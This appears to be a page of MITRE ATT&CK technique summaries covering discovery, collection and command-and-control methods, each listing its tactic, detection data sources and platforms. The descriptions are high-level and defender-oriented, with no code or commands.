Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries.
Tactics:	Command and Control
Data Sources:	Network intrusion detection system, Network protocol analysis, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre